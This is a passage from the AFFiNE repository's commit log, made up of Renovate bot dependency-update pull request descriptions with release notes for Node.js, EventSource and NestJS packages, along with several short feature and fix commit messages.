[#&#8203;62621](https://redirect.github.com/nodejs/node/pull/62621)
-
\[[`ecfa766b41`](https://redirect.github.com/nodejs/node/commit/ecfa766b41)]
- **tools**: fix auto-start-ci (Antoine du Hamel)
[#&#8203;61900](https://redirect.github.com/nodejs/node/pull/61900)
-
\[[`17c0a610af`](https://redirect.github.com/nodejs/node/commit/17c0a610af)]
- **tools**: fix parsing of commit trailers in `lint-release-proposal`
GHA (Antoine du Hamel)
[#&#8203;62077](https://redirect.github.com/nodejs/node/pull/62077)
-
\[[`89ad7dc63b`](https://redirect.github.com/nodejs/node/commit/89ad7dc63b)]
- **tools**: enforce removal of `lts-watch-*` labels on release
proposals (Antoine du Hamel)
[#&#8203;61672](https://redirect.github.com/nodejs/node/pull/61672)
-
\[[`5f9bb8ef0c`](https://redirect.github.com/nodejs/node/commit/5f9bb8ef0c)]
- **tools**: revert tools GHA workflow to ubuntu-latest (Richard Lau)
[#&#8203;62024](https://redirect.github.com/nodejs/node/pull/62024)
-
\[[`977ef80ac1`](https://redirect.github.com/nodejs/node/commit/977ef80ac1)]
- **url**: process crash via malformed UNC hostname in pathToFileURL()
(Nicola Del Gobbo)
[#&#8203;62574](https://redirect.github.com/nodejs/node/pull/62574)
-
\[[`ad8f518a81`](https://redirect.github.com/nodejs/node/commit/ad8f518a81)]
- **zlib**: fix use-after-free when reset() is called during write
(Matteo Collina)
[#&#8203;62325](https://redirect.github.com/nodejs/node/pull/62325)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzMuNiIsInVwZGF0ZWRJblZlciI6IjQzLjE3My42IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 11:55:16 +08:00
DarkSky f626dbd590 fix(server): realtime loading (#14959)
#### PR Dependency Tree


* **PR #14959** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Refactor**
* Rewired realtime and copilot services to require their runtime
dependencies, improving reliability and removing nullable/optional
runtime paths.

* **Tests**
* Centralized service creation in tests with helper factories and added
checks ensuring realtime dependency injection is configured as expected.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14959)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-14 11:54:45 +08:00
renovate[bot] 419fc5d5e0 chore: bump up Recouse/EventSource version to from: "0.1.8" (#14960)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [Recouse/EventSource](https://redirect.github.com/Recouse/EventSource)
| patch | `from: "0.1.7"` → `from: "0.1.8"` |

---

### Release Notes

<details>
<summary>Recouse/EventSource (Recouse/EventSource)</summary>

###
[`v0.1.8`](https://redirect.github.com/Recouse/EventSource/releases/tag/0.1.8)

[Compare
Source](https://redirect.github.com/Recouse/EventSource/compare/0.1.7...0.1.8)

#### What's Changed

- Fix O(n²) performance in ServerEventParser.parse() by
[@&#8203;liefran-sim](https://redirect.github.com/liefran-sim) in
[#&#8203;49](https://redirect.github.com/Recouse/EventSource/pull/49)

#### New Contributors

- [@&#8203;liefran-sim](https://redirect.github.com/liefran-sim) made
their first contribution in
[#&#8203;49](https://redirect.github.com/Recouse/EventSource/pull/49)

**Full Changelog**:
<https://github.com/Recouse/EventSource/compare/0.1.7...0.1.8>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzMuNiIsInVwZGF0ZWRJblZlciI6IjQzLjE3My42IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 10:15:11 +08:00
DarkSky 1201f7c350 chore: bump rspack (#14957)
#### PR Dependency Tree


* **PR #14957** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
  * Updated minimum Node version requirement to 22.12.0 or later.
* Updated build tool dependencies including rspack and related packages.
  * Removed CI-specific logging behavior from development server.
* Migrated to native HTML plugin integration for improved build
efficiency.
* Simplified build configuration by removing unused experimental
options.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14957)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-14 04:18:49 +08:00
DarkSky 4b4def3a11 feat(server): gemini embedding 2 support (#14956)
#### PR Dependency Tree


* **PR #14956** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
* Improved Gemini Vertex provider configuration validation logic for
enhanced reliability.
  * Refined Google Vertex publisher base URL construction handling.

* **Tests**
  * Added test coverage for Gemini Embedding 2 model resolution.
* Added test coverage for Gemini Vertex provider Google Cloud
integration.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14956)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-14 04:12:49 +08:00
renovate[bot] 2b22fe4692 chore: bump up nestjs (#13791)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/apollo](https://redirect.github.com/nestjs/graphql) |
[`13.2.4` →
`13.4.0`](https://renovatebot.com/diffs/npm/@nestjs%2fapollo/13.2.4/13.4.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fapollo/13.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fapollo/13.2.4/13.4.0?slim=true)
|
| [@nestjs/common](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common))
| [`11.1.18` →
`11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.18/11.1.20)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.20?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.18/11.1.20?slim=true)
|
| [@nestjs/core](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core))
| [`11.1.18` →
`11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.18/11.1.20)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.20?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.18/11.1.20?slim=true)
|
| [@nestjs/graphql](https://redirect.github.com/nestjs/graphql) |
[`13.2.5` →
`13.4.0`](https://renovatebot.com/diffs/npm/@nestjs%2fgraphql/13.2.5/13.4.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fgraphql/13.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fgraphql/13.2.5/13.4.0?slim=true)
|
| [@nestjs/platform-express](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express))
| [`11.1.18` →
`11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.18/11.1.20)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.20?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.18/11.1.20?slim=true)
|
| [@nestjs/platform-socket.io](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io))
| [`11.1.18` →
`11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.18/11.1.20)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.20?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.18/11.1.20?slim=true)
|
| [@nestjs/schedule](https://redirect.github.com/nestjs/schedule) |
[`6.1.1` →
`6.1.3`](https://renovatebot.com/diffs/npm/@nestjs%2fschedule/6.1.1/6.1.3)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fschedule/6.1.3?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fschedule/6.1.1/6.1.3?slim=true)
|
| [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) |
[`11.2.7` →
`11.4.2`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.2.7/11.4.2)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fswagger/11.4.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fswagger/11.2.7/11.4.2?slim=true)
|
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets))
| [`11.1.18` →
`11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.18/11.1.20)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.20?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.18/11.1.20?slim=true)
|

---

### Release Notes

<details>
<summary>nestjs/graphql (@&#8203;nestjs/apollo)</summary>

###
[`v13.4.0`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.4.0)

[Compare
Source](https://redirect.github.com/nestjs/graphql/compare/v13.3.0...v13.4.0)

#### 13.4.0 (2026-04-30)

##### Features

- `apollo`, `graphql`, `mercurius`
- [#&#8203;3811](https://redirect.github.com/nestjs/graphql/pull/3811)
feat(graphql): Add registerIn option for module-scoped type filtering
([@&#8203;joe-re](https://redirect.github.com/joe-re))

##### Bug fixes

- `graphql`
- [#&#8203;3959](https://redirect.github.com/nestjs/graphql/pull/3959)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
stop double-registering PickType inputs
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3960](https://redirect.github.com/nestjs/graphql/pull/3960)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
de-duplicate per-target metadata in TargetMetadataCollection
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- `apollo`, `graphql`
- [#&#8203;3962](https://redirect.github.com/nestjs/graphql/pull/3962)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
restore Timestamp scalar parsers in federation factory
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Enhancements

- `graphql`
- [#&#8203;3963](https://redirect.github.com/nestjs/graphql/pull/3963)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
validate registerEnumType/createUnionType options eagerly
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Dependencies

- `graphql`
- [#&#8203;3954](https://redirect.github.com/nestjs/graphql/pull/3954)
fix(deps): update graphql-tools monorepo
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 3

- Masato Noguchi ([@&#8203;joe-re](https://redirect.github.com/joe-re))
- Mateus Welter Goettems
([@&#8203;mateuswgoettems](https://redirect.github.com/mateuswgoettems))
- Yogeshwaran C
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

###
[`v13.3.0`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.3.0)

[Compare
Source](https://redirect.github.com/nestjs/graphql/compare/v13.2.5...v13.3.0)

#### 13.3.0 (2026-04-22)

##### Bug fixes

- `graphql`
- [#&#8203;3949](https://redirect.github.com/nestjs/graphql/pull/3949)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
count args for parenless arrow functions
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3952](https://redirect.github.com/nestjs/graphql/pull/3952)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
keep class directive when a field has the same SDL
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3946](https://redirect.github.com/nestjs/graphql/pull/3946)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
emit enum key for Args defaultValue in generated SDL
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3934](https://redirect.github.com/nestjs/graphql/pull/3934)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
treat single-key string enums as enums in plugin type detection
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3939](https://redirect.github.com/nestjs/graphql/pull/3939)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
preserve ResolveField options for all overloads
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- `apollo`
- [#&#8203;3940](https://redirect.github.com/nestjs/graphql/pull/3940)
fix(apollo): preserve HTTP 200 for execution-level GraphQL errors
([@&#8203;maruthang](https://redirect.github.com/maruthang))

##### Enhancements

- `graphql`
- [#&#8203;3838](https://redirect.github.com/nestjs/graphql/pull/3838)
perf(graphql): bypass ExternalContextCreator for scalar ResolveField
fast-path ([@&#8203;ArielSafar](https://redirect.github.com/ArielSafar))
- [#&#8203;3950](https://redirect.github.com/nestjs/graphql/pull/3950)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
forward specifiedByURL and extensions on custom scalars
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3951](https://redirect.github.com/nestjs/graphql/pull/3951)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
accept array of SDL strings in
[@&#8203;Directive](https://redirect.github.com/Directive)
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3944](https://redirect.github.com/nestjs/graphql/pull/3944)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
emit clearer error when nested object type is used in mapped input
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3943](https://redirect.github.com/nestjs/graphql/pull/3943)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
add conditional exports for browser shim
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3942](https://redirect.github.com/nestjs/graphql/pull/3942)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
default federation to v2.12 directives
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3936](https://redirect.github.com/nestjs/graphql/pull/3936)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
allow CustomScalar methods to return null
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- `apollo`, `graphql`
- [#&#8203;3948](https://redirect.github.com/nestjs/graphql/pull/3948)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
support directives on enums and unions
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Dependencies

- `graphql`
- [#&#8203;3925](https://redirect.github.com/nestjs/graphql/pull/3925)
chore(deps): update dependency ts-morph to v28
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3918](https://redirect.github.com/nestjs/graphql/pull/3918)
fix(deps): update graphql-tools monorepo
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- `mercurius`
- [#&#8203;3928](https://redirect.github.com/nestjs/graphql/pull/3928)
chore(deps): update dependency fastify to v5.8.5
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3858](https://redirect.github.com/nestjs/graphql/pull/3858)
chore(deps): update dependency
[@&#8203;mercuriusjs/gateway](https://redirect.github.com/mercuriusjs/gateway)
to v5.2.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3920](https://redirect.github.com/nestjs/graphql/pull/3920)
chore(deps): update dependency mercurius to v16.9.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 3

- Ariel Safar
([@&#8203;ArielSafar](https://redirect.github.com/ArielSafar))
- Maruthan G
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- Yogeshwaran C
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

###
[`v13.2.5`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.2.5)

[Compare
Source](https://redirect.github.com/nestjs/graphql/compare/v13.2.4...v13.2.5)

##### 13.2.5 (2026-04-09)

##### Bug fixes

- `graphql`
- [#&#8203;3846](https://redirect.github.com/nestjs/graphql/pull/3846)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
handle definitions factory typename option
([@&#8203;NicolasGn](https://redirect.github.com/NicolasGn))

##### Enhancements

- `graphql`
- [#&#8203;3889](https://redirect.github.com/nestjs/graphql/pull/3889)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
add stopOnApplicationShutdown option for graceful shutdown
([@&#8203;dgfh0450](https://redirect.github.com/dgfh0450))

##### Dependencies

- `graphql`
- [#&#8203;3894](https://redirect.github.com/nestjs/graphql/pull/3894)
fix(deps): update dependency graphql-ws to v6.0.8
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3852](https://redirect.github.com/nestjs/graphql/pull/3852)
chore(deps): update dependency graphql to v16.13.2
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3888](https://redirect.github.com/nestjs/graphql/pull/3888)
fix(deps): update dependency ws to v8.20.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3901](https://redirect.github.com/nestjs/graphql/pull/3901)
fix(deps): update dependency
[@&#8203;nestjs/mapped-types](https://redirect.github.com/nestjs/mapped-types)
to v2.1.1
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3904](https://redirect.github.com/nestjs/graphql/pull/3904)
fix(deps): update dependency lodash to v4.18.1 \[security]
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- `apollo`
- [#&#8203;3902](https://redirect.github.com/nestjs/graphql/pull/3902)
fix(deps): update dependency lodash.omit to v4.18.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3897](https://redirect.github.com/nestjs/graphql/pull/3897)
chore(deps): update dependency
[@&#8203;apollo/server](https://redirect.github.com/apollo/server) to
v5.5.0 \[security]
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3881](https://redirect.github.com/nestjs/graphql/pull/3881)
chore(deps): update dependency
[@&#8203;apollo/gateway](https://redirect.github.com/apollo/gateway) to
v2.10.5 \[security]
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- `mercurius`
- [#&#8203;3899](https://redirect.github.com/nestjs/graphql/pull/3899)
chore(deps): update dependency
[@&#8203;mercuriusjs/federation](https://redirect.github.com/mercuriusjs/federation)
to v5.1.1
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3890](https://redirect.github.com/nestjs/graphql/pull/3890)
chore(deps): update dependency fastify to v5.8.4
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3868](https://redirect.github.com/nestjs/graphql/pull/3868)
chore(deps): update dependency mercurius to v16.8.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 2

- Nicolas Guégan
([@&#8203;NicolasGn](https://redirect.github.com/NicolasGn))
- YoonDH ([@&#8203;dgfh0450](https://redirect.github.com/dgfh0450))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

###
[`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

###
[`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

#### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
- [#&#8203;16762](https://redirect.github.com/nestjs/nest/pull/16762)
fix(microservices): use backing field for consumer CRASH event listener
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- [#&#8203;16764](https://redirect.github.com/nestjs/nest/pull/16764)
fix(microservices): prevent stack overflow in jsonsocket.handledata()
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/core)</summary>

###
[`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

###
[`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

##### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
- [#&#8203;16762](https://redirect.github.com/nestjs/nest/pull/16762)
fix(microservices): use backing field for consumer CRASH event listener
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- [#&#8203;16764](https://redirect.github.com/nestjs/nest/pull/16764)
fix(microservices): prevent stack overflow in jsonsocket.handledata()
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-express)</summary>

###
[`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

###
[`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

##### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
- [#&#8203;16762](https://redirect.github.com/nestjs/nest/pull/16762)
fix(microservices): use backing field for consumer CRASH event listener
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- [#&#8203;16764](https://redirect.github.com/nestjs/nest/pull/16764)
fix(microservices): prevent stack overflow in jsonsocket.handledata()
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-socket.io)</summary>

###
[`v11.1.20`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.20)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

##### v11.1.20 (2026-05-13)

##### Bug fixes

- `core`, `testing`
- [#&#8203;16939](https://redirect.github.com/nestjs/nest/pull/16939)
fix(core): fix deeply nested transient providers resolution
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- `core`
- [#&#8203;16861](https://redirect.github.com/nestjs/nest/pull/16861)
fix(core): fix [@&#8203;Sse](https://redirect.github.com/Sse) losing
events on complete
([@&#8203;MatthiasBrehmer](https://redirect.github.com/MatthiasBrehmer))
- [#&#8203;16753](https://redirect.github.com/nestjs/nest/pull/16753)
fix(core): defer sse writehead until after lifecycle completes
([@&#8203;jkalberer](https://redirect.github.com/jkalberer))
- [#&#8203;16782](https://redirect.github.com/nestjs/nest/pull/16782)
fix(core): use strict null check for SSE message id
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- `microservices`
- [#&#8203;16850](https://redirect.github.com/nestjs/nest/pull/16850)
fix(microservices): ServerRMQ crashes at boot when
[@&#8203;MessagePattern](https://redirect.github.com/MessagePattern)(undefined)
is combined with wildcards: true
([@&#8203;lavieennoir](https://redirect.github.com/lavieennoir))
- `common`
- [#&#8203;16845](https://redirect.github.com/nestjs/nest/pull/16845)
fix(common): accept zero timestamp in parse date pipe
([@&#8203;Mysh3ll](https://redirect.github.com/Mysh3ll))
- `platform-socket.io`
- [#&#8203;16742](https://redirect.github.com/nestjs/nest/pull/16742)
fix(socket.io): Deduplicate disconnect listener in bindMessageHandlers
([@&#8203;fru1tworld](https://redirect.github.com/fru1tworld))

##### Enhancements

- `microservices`
- [#&#8203;16676](https://redirect.github.com/nestjs/nest/pull/16676)
feat(microservices): add return buffers option for binary data
([@&#8203;Forceres](https://redirect.github.com/Forceres))
- [#&#8203;16826](https://redirect.github.com/nestjs/nest/pull/16826)
feat(microservices): handle rmq blocked/unblocked connection events
([@&#8203;thisalihassan](https://redirect.github.com/thisalihassan))
- `common`
- [#&#8203;16902](https://redirect.github.com/nestjs/nest/pull/16902)
fix(common): filetype validator buffer message
([@&#8203;QusaiAlbonni](https://redirect.github.com/QusaiAlbonni))
- `platform-express`
- [#&#8203;16844](https://redirect.github.com/nestjs/nest/pull/16844)
feat(platform-express): add defParamCharset to MulterOptions
([@&#8203;starnayuta](https://redirect.github.com/starnayuta))

##### Dependencies

- `platform-ws`
- [#&#8203;16941](https://redirect.github.com/nestjs/nest/pull/16941)
chore(deps): bump ws from 8.20.0 to 8.20.1
([@&#8203;dependabot\[bot\]](https://redirect.github.com/apps/dependabot))

##### Committers: 13

- Ali Hassan
([@&#8203;thisalihassan](https://redirect.github.com/thisalihassan))
- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Dmytro Khyzhniak
([@&#8203;lavieennoir](https://redirect.github.com/lavieennoir))
- Harsh Rathod
([@&#8203;harshrathod50](https://redirect.github.com/harshrathod50))
- IlyaCredo ([@&#8203;Forceres](https://redirect.github.com/Forceres))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- Mysh3ll ([@&#8203;Mysh3ll](https://redirect.github.com/Mysh3ll))
- [@&#8203;MatthiasBrehmer](https://redirect.github.com/MatthiasBrehmer)
- [@&#8203;QusaiAlbonni](https://redirect.github.com/QusaiAlbonni)
- [@&#8203;jkalberer](https://redirect.github.com/jkalberer)
- [@&#8203;pazaderey](https://redirect.github.com/pazaderey)
- fru1tworld
([@&#8203;fru1tworld](https://redirect.github.com/fru1tworld))
- starnayuta
([@&#8203;starnayuta](https://redirect.github.com/starnayuta))

###
[`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

#### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
- [#&#8203;16762](https://redirect.github.com/nestjs/nest/pull/16762)
fix(microservices): use backing field for consumer CRASH event listener
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- [#&#8203;16764](https://redirect.github.com/nestjs/nest/pull/16764)
fix(microservices): prevent stack overflow in jsonsocket.handledata()
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon
